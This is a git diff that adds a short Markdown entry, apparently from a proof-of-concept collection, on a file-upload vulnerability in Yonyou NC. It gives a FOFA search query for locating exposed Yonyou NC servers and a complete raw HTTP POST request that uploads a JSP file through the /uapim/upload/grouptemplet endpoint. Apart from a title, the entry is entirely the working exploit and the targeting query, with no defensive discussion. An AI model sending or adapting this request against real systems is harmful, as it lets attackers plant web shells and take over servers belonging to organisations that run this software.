diff --git a/用友NC_grouptemplet文件上传漏洞.md b/用友NC_grouptemplet文件上传漏洞.md new file mode 100644 index 0000000..a09e77c --- /dev/null +++ b/用友NC_grouptemplet文件上传漏洞.md @@ -0,0 +1,23 @@ +## 用友NC_grouptemplet文件上传漏洞 + + +## fofa +``` +title="YONYOU NC" +``` + + +## poc +``` +POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ +User-Agent: Mozilla/5.0 + +------WebKitFormBoundaryEXmnamw5gVZG9KAQ +Content-Disposition: form-data; name="file"; filename="test.jsp" +Content-Type: application/octet-stream + +111111111111111111111 +------WebKitFormBoundaryEXmnamw5gVZG9KAQ-- +```